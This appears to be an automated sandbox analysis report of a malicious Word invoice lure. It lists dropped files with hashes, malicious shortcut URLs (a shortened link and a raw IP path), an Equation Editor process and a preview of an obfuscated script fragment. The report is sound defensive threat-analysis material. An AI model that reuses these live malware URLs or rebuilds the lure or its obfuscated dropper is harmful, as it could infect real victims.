                                                                                                                        SHA-512:0D37F8D2BE6ABE37EA39A9BB9D3283AC710D65036C4C715F722E7D280AB65CDED5AB5DAA74FC664A0AF9478A274F314A4923473479CB62B324D49CEFA5328055
                                                                                                                        Malicious:false
                                                                                                                        Preview:......M.eFy...z.....o.C.#.&... S,...X.F...Fa.q.............................Z.T..'I...}..s..........%.(.TO. _...g......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        File Type:MS Windows 95 Internet shortcut text (URL=<https://og1.in/S7UYq0>), ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):47
                                                                                                                        Entropy (8bit):4.681832468514789
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:HRAbABGQYm2fjUzv:HRYFVm4ozv
                                                                                                                        MD5:A53EC7DED13AD3FF40ABCD534C27D766
                                                                                                                        SHA1:22D3B5EBEBD017DAA951BF1826D62952BDC7CDF7
                                                                                                                        SHA-256:C77D6054871DF78330ECD9A20E552469C8BC6A6DF8A1046BEF2D444CF5285C13
                                                                                                                        SHA-512:E1B3B7ECCB85983BDB7A6FDFCE80C1CDADD4F7CED8F90C670D428963982331DAD5250CA9FA472A8BE8B4D34AD9AD9DBDDE97B37B29DB98BAC33A7419DADE93D6
                                                                                                                        Malicious:true
                                                                                                                        Preview:[InternetShortcut]..URL=https://og1.in/S7UYq0..
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:06 2023, mtime=Fri Aug 11 15:42:06 2023, atime=Mon Sep 30 11:59:56 2024, length=788502, window=hide
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1074
                                                                                                                        Entropy (8bit):4.565591546542952
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:8C7Nn9gXg/XAlCPCHaXIBY8B/BGFX+WMcuoNTrUGicvbz/13rU6DtZ3YilMMEpxi:8C7Nj/XT4Fbk0bef/hDv3qv157u
                                                                                                                        MD5:8E05A68EF12B91758B4D8A91F86C60CE
                                                                                                                        SHA1:7E8B33C119982A944097908F4E33465245532A43
                                                                                                                        SHA-256:0F34B64ABB8F32227DEDBF19FB82C0D07C1F466383A2FB04D4A25BDF5BECA2CC
                                                                                                                        SHA-512:BF0AE29465E3539DA8C2087D4B3EC050F32B8E66DC27C93482B712BF439D14479D0AF9D74EB4FE4C834E3D1D9892F7E17EE256D2C95446B01BD325A21787D7BF
                                                                                                                        Malicious:false
                                                                                                                        Preview:L..................F.... ....Z..r....Z..r....K.8................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....>Yzg..user.8......QK.X>Yzg*...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....~.2.....>Y}g .FACTUR~1.DOC..b.......WD..WD.*.........................f.a.c.t.u.r.a. .p.r.o.f.o.r.m.a. ...d.o.c.x...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\123991\Users.user\Desktop\factura proforma .docx.doc.1.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.f.a.c.t.u.r.a. .p.r.o.f.o.r.m.a. ...d.o.c.x...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......123991....
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        File Type:Generic INItialization configuration [doc]
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):119
                                                                                                                        Entropy (8bit):4.808847729775355
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:bDvKDgQFlTRQSLTXsVIq7SmX1qXsVIq7Sv:btQFZkqEhqEc
                                                                                                                        MD5:67EB9509FAEC361E5250C0507BBF8BA9
                                                                                                                        SHA1:560844BC5318BB9D2C32A8A3AA9F18775D57CA8F
                                                                                                                        SHA-256:1A9B2663744D72BDF42189BC719A79A606EC5D2570F515F94441FF7D4BA1BEE0
                                                                                                                        SHA-512:CA12F374AFCB9C87E7C82EF4FE03158503595859F59D4E749748EE90477BE8E1317BD0B7A7BE94EBAD3BF6B8C9345CBD8A93AC86EFBBD50A3454C4E11FD81AA5
                                                                                                                        Malicious:false
                                                                                                                        Preview:[folders]..S7UYq0.url=0..uc on 91.134.96.177.url=0..factura proforma .docx.LNK=0..[doc]..factura proforma .docx.LNK=0..
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        File Type:MS Windows 95 Internet shortcut text (URL=<http://91.134.96.177/80/uc/>), ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):53
                                                                                                                        Entropy (8bit):4.659445162429413
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:HRAbABGQYm//WSKdVKQGKov:HRYFVm//VKaQGKov
                                                                                                                        MD5:B2B5585FFBBE6ECEAC7B9A54F231EBCA
                                                                                                                        SHA1:D7F347C319960D54350384AB53E39188CD69AC22
                                                                                                                        SHA-256:7B3A6AC8252C7A027AD0F19E3D54C074FF2CCCC1947E34326AAA905DA24D5077
                                                                                                                        SHA-512:AD89C45C5D5C8E69AAEB0BA1C5F03468F8BE5830806A1134CF2AA018B61118DF9B35932ABE17A9C7D2B81FE71BD949675C2C094262D3A74126E0A3C640360ABE
                                                                                                                        Malicious:true
                                                                                                                        Preview:[InternetShortcut]..URL=http://91.134.96.177/80/uc/..
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):162
                                                                                                                        Entropy (8bit):2.4797606462020307
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                                                                        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                                                                        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                                                                        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                                                                        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                                                                        Malicious:false
                                                                                                                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):247044
                                                                                                                        Entropy (8bit):3.7540611984178978
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:QT0K+XNr+WEx75gOUs5n7WgBzwmz7KTyXXcw5rN0gf:FK+Nr+WEbpL7BBzwS70yncw5rN0gf
                                                                                                                        MD5:AFA95FFEF9A1E2EE01B008DA56592B30
                                                                                                                        SHA1:9D5C767BB2F496377A5A797FC43E8C004530028C
                                                                                                                        SHA-256:4988DF74DF1AD4B83316BD4D9C110996BA2EB392C7C2ADB1422FFB60936611BE
                                                                                                                        SHA-512:632136F51D71D7632F70A5DADB1693801461C18C38357AD154B4BD51EE0D84E662952CE29B83996867C5716A2F8D3E325A693E88CD214B9383E9A2CE1ED57EF3
                                                                                                                        Malicious:true
                                                                                                                        Preview:..L.l.i.k.N.k.f.R.e.C.q.C.K.L.U.B.G.e.u.c.f.z.f.P. .=. .".G.L.I.l.i.f.L.U.A.W.n.p.h.k.G.U.x.A.c.B.K.A.L.i.".....i.f.G.t.L.K.W.W.U.C.G.P.m.N.m.g.a.k.i.z.o.O.W.C. .=. .".e.R.K.t.W.u.C.G.W.K.W.K.B.c.O.P.j.i.P.W.O.L.l.i.".....K.W.x.z.L.f.k.A.f.N.m.T.f.W.a.L.f.g.T.c.O.i.h.i. .=. .".L.G.O.z.m.B.A.j.G.L.l.Q.G.W.o.h.f.z.W.W.k.P.U.s.".....C.W.Z.p.G.A.b.l.B.W.h.R.d.K.v.c.N.W.W.h.c.o.A.T. .=. .".o.U.a.U.e.W.h.W.c.K.C.T.c.I.d.c.q.a.h.U.a.R.h.B.".....i.L.U.x.d.z.m.L.u.i.q.x.c.c.A.L.C.v.N.c.i.o.U.A. .=. .".G.W.c.N.P.f.N.K.o.m.L.U.P.J.Z.h.O.d.p.p.C.o.i.K.".....c.L.t.U.N.c.C.x.e.W.Z.d.B.T.p.g.U.L.Z.W.q.b.U.K. .=. .".O.K.W.W.p.W.l.o.K.L.f.W.A.P.z.k.U.e.L.L.U.R.m.W.".....i.u.K.s.x.s.h.J.c.K.B.n.G.k.m.m.r.G.H.l.C.h.N.q. .=. .".G.k.c.f.U.k.W.i.h.z.R.z.G.G.C.L.C.U.c.Z.P.G.i.W.".....W.u.i.L.K.f.a.W.W.c.G.Z.W.Z.J.f.I.P.C.Z.O.f.h.N. .=. .".a.N.b.K.K.b.f.k.W.L.K.z.K.u.C.p.W.R.m.N.f.L.W.L.".....L.q.m.P.K.z.v.m.A.K.G.W.N.N.W.G.A.l.L.i.o.W.A.k. .=. .".s.S.Z.I.c.i.W.K.L.K.O.L.o.W.N.b.K.C.U.L.k.t.q.d.".....d.Q.z.O.
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):162
                                                                                                                        Entropy (8bit):2.4797606462020307
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                                                                        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                                                                        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                                                                        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                                                                        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                                                                        Malicious:false
                                                                                                                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                                        File type:Microsoft Word 2007+
                                                                                                                        Entropy (8bit):7.994747969860824
                                                                                                                        TrID:
                                                                                                                        • Word Microsoft Office Open XML Format document (49504/1) 58.23%
                                                                                                                        • Word Microsoft Office Open XML Format document (27504/1) 32.35%
                                                                                                                        • ZIP compressed archive (8000/1) 9.41%
                                                                                                                        File name:factura proforma .docx.doc
                                                                                                                        File size:788'502 bytes
                                                                                                                        MD5:cde646bbf76aa0cb430f71ec2408b4bd
                                                                                                                        SHA1:40fbea905916fc49bfcaf203b3b15e78d9053df5
                                                                                                                        SHA256:a91decdd65e45f46a226097d1331b51002c3c6120c5a2afdb7d29c5973166ce5
                                                                                                                        SHA512:22cea88742a8a11813bbc68fc661a5ed63bac3b20c4b8c718367737f3265c859a2506815f6a80fbc39c8ebbb4ebcae0adb7414e61c0660b66e7da94ec2002801
                                                                                                                        SSDEEP:12288:hNCRJClLkChwGm0LpsjYJ46gvycWL5c7PasQB2i4MYJv/u8wdyAxd6mzoGf2S2AM:h4ClKL0CjY7EDWQisQB2tXupdyZGt2AM
                                                                                                                        TLSH:88F42374E49ACDF3CE66F0B38661A4BCE6B4EEFC0645889365BD0345958E9A0F0D418F
                                                                                                                        File Content Preview:PK........~o>Y+..0............[Content_Types].xmlUT......f...f...f.V.j.@.}/.....i..J)....c.h.....%.7v&......SL".../.bu.3s4hu.;[<A...Z,..(..`:.....o.GQ )o...j.......V...X0.c-Z..IJ.-8.U......)....Q..j..z.. u...J..b....Rg..S..+.:.9$#.......N...\.....vZ...O..
                                                                                                                        Icon Hash:2764a3aaaeb7bdbf
                                                                                                                        Document Type:OpenXML
                                                                                                                        Number of OLE Files:2
                                                                                                                        Has Summary Info:
                                                                                                                        Application Name:
                                                                                                                        Encrypted Document:False
                                                                                                                        Contains Word Document Stream:True
                                                                                                                        Contains Workbook/Book Stream:False
                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                        Contains Visio Document Stream:False
                                                                                                                        Contains ObjectPool Stream:False
                                                                                                                        Flash Objects Count:0
                                                                                                                        Contains VBA Macros:False
                                                                                                                        Code Page:1252
                                                                                                                        Title:
                                                                                                                        Subject:
                                                                                                                        Author:91974
                                                                                                                        Keywords:
                                                                                                                        Template:Normal.dotm
                                                                                                                        Last Saved By:91974
                                                                                                                        Revion Number:4
                                                                                                                        Total Edit Time:1
                                                                                                                        Last Printed:2024-07-15 15:30:47
                                                                                                                        Create Time:2024-09-30T08:11:00Z
                                                                                                                        Last Saved Time:2024-09-30T08:12:00Z
                                                                                                                        Number of Pages:1
                                                                                                                        Number of Words:0
                                                                                                                        Number of Characters:0
                                                                                                                        Thumbnail:(n-&" WMFCX >l"^ EMF>)8X?F, EMF+@xxF\PEMF+"@@$@0@?!@@!"!"!"!"!"!'%&%"6"%Ld"""!??%6#%Ld""!??%,6#,%Ld,",,"!??%B6#B%LdB"BB"!??%[6#[%Ld["[["!??%6#%Ld""!??%6#%Ld""!??%6#%Ld""!??%6#%Ld""!??%6#%Ld"!??%"6%Ld""!??%"6"%Ld"""!??%|6|%Ld|||!??%6%Ld!??%6%Ld!??'%Ld!!!??%%6"%Ld!!!??%6%Ld!??'%(&%6"%Ld! !??%6%Ld!??'%(&%6"%Ld! !??%!6!%Ld!!!!??!bK!;$$==V(X(($$AA<C%'%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%(%""RpArial w< @XT!%l*w-atQml*w(X`tQ@X/~ZTX/~Z[dX{/~Zl*wO/~ZLZI/ |Z)1I/T!%M"*< M"*/*HX+w9Y+w`Y+wdv%'A>TT+UUA&ALP1TT/AUUA&A/LP2TTHZUUA&AHLP3TTqUUA&AqLP4TTUUA&AyL"P5TTUUA&ALP6TTUUA&ALP7TTUUA&ALP8TTJTUUA&AJLPATTUUA&ALPBTTr}UUA&ArLPC%%"!%'A>#'%Ld#B"B(C!??'%(LdJ!??&WMFC>'%(LdJ!??'%(Ld"(!??RpCambria w< T!%l*w2atQml*wF`tQ/F!F/!Ft"{/!*wO/!!I/ !L}I/T!%P"< P"a#/P"$ +w94!@ F+w Fdv%RpCambria w< T!%l*wKatQml*w^=`tQ/^=!^=/!^=t"{/!*wO/!!I/ !XI/T!%P"2< P"2a#/P"1$ +w94!@ ^=+w ^=dv%Rp Calibri w< T!%l*w#atQml*w,`tQ/,!,/!,t"{/!*wO/!!I/ !I/T!%P",< P",a#/P"+$ +w94!@ ,+w ,dv%T|&lUUA&A&L\N ordreTdUUA&ALTDATE%%%"!%%TUUA&ALtSOLDE AU 02/01/2024Rp Arial w< T!%l*w-atQml*wX=`tQ/X=!X=/!X=t"{/!*wO/!!I/ !I/T!%P"< P"a#/P"$ +w94!@ X=+w X=dv%%%%"!%%#C[T$CYUUA&AC$LWORMS ALGERIE SHIPPING SPA (WALSHIP)%%%"!%%#\TUUA&A"^LtCaisse Annaba - 2024%%%"!%%TUUA&AL|LIBELLES / DESIGNATIONS%%"!%%#%%"!%%'%((&%"6"B%Ld""A",!??%|6|B%Ld||A|,!??%6B%LdA,!??%6B%LdA,!??%|6|%Ld|||!??%6%Ld!??%6%Ld!??'%(&%"B6"%Ld"B""B!??%|6|%Ld|||Q!??%6%LdQ!??%((&%"6%Ld""!??%",6,%Ld",,",!??'%(&%#B6B%Ld#BB#B!??%#6%Ld##!??%#6%Ld##!??%#6%Ld##!??%#6%Ld##!??%#6%Ld#!??%(%"!%#%"!%'%%6%Ld!??%6%Ld!??%"Q|P(x( F4(EMF+*@$??FEMF+@''',',',--""-@!"-#-@!"-,,#-@!",-BB#-@!"B-[[#-@!"[-#-@!"-#-@!"-#-@!"-#-@!"-#-@!"-"-@!"-""-@!"-||-@!|--@!--@!-@!!--"-@!!--@!--"-@! --@!--"-@! -!!-@!!,---$----$----$----$----$----$----$----$----$----$----$----$----$----$---''Arial-'A>212/22H32q42y"52627282JA2B2rC-"System-'-'A>,#-@!C(B"-@!J-@!J-@!("Cambria-Cambria- Calibri-2&N ordre2DATE---'--,$2SOLDE AU 02/01/2024 Arial----'--,[C#=2C$WORMS ALGERIE SHIPPING SPA (WALSHIP)---'--,\#%2^"Caisse Annaba - 2024---'--,*2LIBELLES / DESIGNATIONS--'--,#--'--,--"B"-@!,"-|B|-@!,|-B-@!,-B-@!,-||-@!|--@!--@!--B""-@!B"-||-@!Q|--@!Q--"-@!"-,",-@!,"--B#B-@!B#-#-@!#-#-@!#-#-@!#-#-@!#-#-@!#--'-,#-'-,---@!--@!-'#A(
                                                                                                                        Creating Application:Microsoft Office Word
                                                                                                                        Security:0
                                                                                                                        Document Code Page:1252
                                                                                                                        Number of Lines:1
                                                                                                                        Number of Paragraphs:1
                                                                                                                        Thumbnail Scaling Desired:false
                                                                                                                        Company:Grizli777
                                                                                                                        Contains Dirty Links:false
                                                                                                                        Shared Document:false
                                                                                                                        Changed Hyperlinks:false
                                                                                                                        Application Version:12.0000
                                                                                                                        General
                                                                                                                        Stream Path:\x1CompObj
                                                                                                                        CLSID:
                                                                                                                        File Type:data
                                                                                                                        Stream Size:114
                                                                                                                        Entropy:4.25248375192737
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        General
                                                                                                                        Stream Path:\x1Ole
                                                                                                                        CLSID:
                                                                                                                        File Type:data
                                                                                                                        Stream Size:20
                                                                                                                        Entropy:0.5689955935892812
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        General
                                                                                                                        Stream Path:\x3EPRINT
                                                                                                                        CLSID:
                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                        Stream Size:55488
                                                                                                                        Entropy:3.128894440734097
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . l . . . . . . . g . . . . + . . . . . . . . . . . . . f . . Z G . . E M F . . . . . . [ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ K . . h C . . F . . . , . . . . . . E M F + . @ . . . . . . . . . . . . . . . . X . . . X . . . F . . . \\ . . . P . . . E M F + " @ . . . . . . . . . . . @ . . . . . . . . . . $ @ . . . . . . . . . . 0 @ . . . . . . . . . . . . ? ! @ . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 00 00 6c 00 00 00 00 00 00 00 67 00 00 00 0d 2b 00 00 db 0c 00 00 00 00 00 00 00 00 00 00 66 b6 00 00 5a 47 00 00 20 45 4d 46 00 00 01 00 c0 d8 00 00 5b 07 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 13 00 00 c8 19 00 00 d8 00 00 00 17 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 4b 03 00 68 43 04 00 46 00 00 00 2c 00 00 00 20 00 00 00 45 4d 46 2b 01 40 01 00
                                                                                                                        General
                                                                                                                        Stream Path:\x3ObjInfo
                                                                                                                        CLSID:
                                                                                                                        File Type:data
                                                                                                                        Stream Size:6
                                                                                                                        Entropy:1.2516291673878228
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . .
                                                                                                                        Data Raw:00 00 03 00 01 00
                                                                                                                        General
                                                                                                                        Stream Path:\x5DocumentSummaryInformation
                                                                                                                        CLSID:
                                                                                                                        File Type:data
                                                                                                                        Stream Size:248
                                                                                                                        Entropy:2.7990677635209242
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C a i s s e 2 0 2 4 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . .
                                                                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a4 00 00 00
                                                                                                                        General
                                                                                                                        Stream Path:\x5SummaryInformation
                                                                                                                        CLSID:
                                                                                                                        File Type:data
                                                                                                                        Stream Size:23536
                                                                                                                        Entropy:3.0728310684122637
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . [ . . . . . . . . . . P . . . . . . . X . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t C o r p o r a t i o n . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . @ . . . . c ? . @ . . . . F ` . . . . . . . . . . . G . . . Z . . . . . . . . ( . . . . . . . . . . n - . . . . . . . . . .
                                                                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c0 5b 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 78 00 00 00 12 00 00 00 88 00 00 00 0b 00 00 00 a0 00 00 00 0c 00 00 00 ac 00 00 00 0d 00 00 00 b8 00 00 00 13 00 00 00 c4 00 00 00 11 00 00 00 cc 00 00 00
                                                                                                                        General
                                                                                                                        Stream Path:Workbook
                                                                                                                        CLSID:
                                                                                                                        File Type:Applesoft BASIC program data, first line number 16
                                                                                                                        Stream Size:28134
                                                                                                                        Entropy:4.264894359698655
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . # . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                        Has Summary Info:
                                                                                                                        Application Name:
                                                                                                                        Encrypted Document:False
                                                                                                                        Contains Word Document Stream:True
                                                                                                                        Contains Workbook/Book Stream:False
                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                        Contains Visio Document Stream:False
                                                                                                                        Contains ObjectPool Stream:False
                                                                                                                        Flash Objects Count:0
                                                                                                                        Contains VBA Macros:False
                                                                                                                        Code Page:1252
                                                                                                                        Title:
                                                                                                                        Subject:
                                                                                                                        Author:91974
                                                                                                                        Keywords:
                                                                                                                        Template:Normal.dotm
                                                                                                                        Last Saved By:91974
                                                                                                                        Revion Number:4
                                                                                                                        Total Edit Time:1
                                                                                                                        Last Printed:2013-03-25 17:07:30
                                                                                                                        Create Time:2024-09-30T08:11:00Z
                                                                                                                        Last Saved Time:2024-09-30T08:12:00Z
                                                                                                                        Number of Pages:1
                                                                                                                        Number of Words:0
                                                                                                                        Number of Characters:0
                                                                                                                        Thumbnail:u22!v!A vv(vbmmlmlkLLLtttIIIPPPgggKKKCCCRRRMMMaaaLLLBBByyyzzzlllDDDEEEmmm>>>LLLGGGDDDooo===xxxxxxkkkCCCFFFbbb~~~===KKKFFFYYYAAA<<<xxxxxxeee;;;yyy555DDD>>>???KKK333xxx|txxxyyyUUUPPP\\\XXXSSSTTTxxx98"ipnxxxxxx[SD'0#xxxxxx45!xxxxxx\UEHQFxxxxxx7<%xxxxxxxxxxxxxxxxxxxxx{{{rpmpkgwvuywvxutkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihljilkjkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihnkjzzzxxxxxxxxx{vy~yxxxgggutuikmhfejjkUTUxxwnmnabdkii^^`ihiyww]]]jii]]_ihicbd^]]NNNbaawxyaaausrwwxmmm\\]ihhzxxssstrq\\]ihh{yyrrrzxw^^`;:;\\\tssqqq|zy{{}```TTTNLMcbcmmmyyyutsgggtsthjlgdcbcdmjjONPcceedekhhZYZkjjaacedepnnkkm```PPPPNN`aamkjrrrsts``bfefkhhZYZlllxxx;9#NVQ58"w~}xxx# ABF469B@@/02{yxQRTyxyzxwLLNC@?UWYzyz{{|QQT??A WXZ~~||~SQPxwyyxwZWVy{}(&&9<?,.2:76sstjhh&')MJIwxz# opqLMOnmmwvwWUSIIJomm #VSRfgi?<=xxx16"4.mxtxxxDBAKMOQNNrtw^[Zyvu\]`fcbvtr789ifewus/01-// UVW866PPQ%#"<<>B@?~KIHBDG300@@A89<**-(&&<98,,.ba`xvu-++!"%CCFxxx98"nvktod17#xxx422;<>#!!JLN568igf@@CJHHOLKprt\YX}zx?>=```\YWJLNgecBDFKKKXXXqooz{}?ACIJM;98323%$&yz|00164478:$""ACF))+<=?**-'%%A><igfpnm'%$ijj}{{124!""%DDGxxx33 }xxx HJL# rsudfh1..IGGhjmLLO:87SPOVWZ -./**,Y[]965dehIJLB@?^^aggi/--wy{[[^ljh>@CROM .,*/02}|VVW%"!>?@daaddf310*+-@?@xxxB=,FNExxxmoq#"$utt579)'&446nnm(()446OPP&$$333AAAecb223OOP/---./ppnAAB_\[hhi99;___0/1PPQ1//,-.rqq??@nlj--.PPQ1//+,-srr==>ywv224srr>>?sqphikBA@rqr,))mmoCBBpqq-++egi"!#yww247&#"}}~997||~433MNOHHH***"!"LLMEBBKKMIII1/0GGJ]\[\\\B@?tsrRRTHHHHIJJJJ'&&%$$EEEeccxxx}pFG1lujxxxxxxxxxxxxxxx{{{spmojewvuusrzzz{{{DDE)),GGGxxxxxxDCC569IHH#$&FEExwxvuutttxxxwvv|{|RRSxwxxxxxxx@B3om[RYNxxxYY[!!#PMMILNDEH ZZ[KJI>=?poo>>A#!"XXYJIHbbd''([XWqrt\[\[[[42330/%&)jjk1.-468nor,,/<;:cehWX[kjhtuv_^^)((>?A357#! 